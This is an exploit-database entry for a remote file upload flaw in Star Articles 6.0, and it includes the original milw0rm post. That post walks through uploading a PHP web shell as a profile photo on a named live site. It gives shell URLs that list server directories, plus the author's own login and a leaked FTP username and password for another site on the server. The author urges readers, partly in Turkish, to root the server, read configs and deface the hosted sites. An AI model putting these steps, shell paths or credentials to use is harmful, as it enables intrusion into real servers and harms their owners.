Star Articles 6.0 Remote File Upload

vendor:

Star Articles

by:

ZoRLu

8.8

CVSS

HIGH

Remote File Upload

434

CWE

Product Name: Star Articles

Affected Version From: 6

Affected Version To: 6

Patch Exists: NO

Related CWE: N/A

CPE: a:star_articles:star_articles:6.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Star Articles 6.0 Remote File Upload

A vulnerability in Star Articles 6.0 allows an attacker to upload a malicious file to the server. The attacker can exploit this vulnerability by registering for the website, logging in, editing their profile, clicking the ‘Browse’ button, selecting a malicious file, and uploading it. The attacker can then access the malicious file by right-clicking on their profile photo and copying the link. The attacker can then access the malicious file by entering the link into their browser.

Mitigation:

The vendor should ensure that only authorized users are allowed to upload files to the server.

Source

Exploit-DB raw data:

[~] Star Articles 6.0 Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: allinurl:"article.download.php"   ( baya bi site var )
[~]
[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica )
[~] -----------------------------------------------------------

expl:

http://script//authorphoto/user_name[id].php

example:

http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )

hemen hacklemeyin arkadaslar serverÃ½ kurcalayIn bakIn misal:

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bir cok site var. ya rootlayÃ½n yada tek tek cakÃ½n config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;) 

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bu serverdaki bir site icin:

ftp://ftp.ababy.com.au/  ( ftp pass ve username )

user: kiddybab

pass: KidEw1nk08

ne biliyim iste biseler yapmaya calIsIn amacIm yardImcÃ½ olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)


first register for site

after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )

click to gozat button and select your shell after upload you shell

more after go repat edit profile page and you look you photo. right click to you photo

select to properties copy photo link and paste you explorer.

go your shell

examp:

user: trt-turk@hotmail.com

passwd: zorlu1

login: 

http://www.lcfarticles.com/user.login.php

shell:

http://www.lcfarticles.com//authorphoto/zorlu40.php


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & RedHaK
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-27]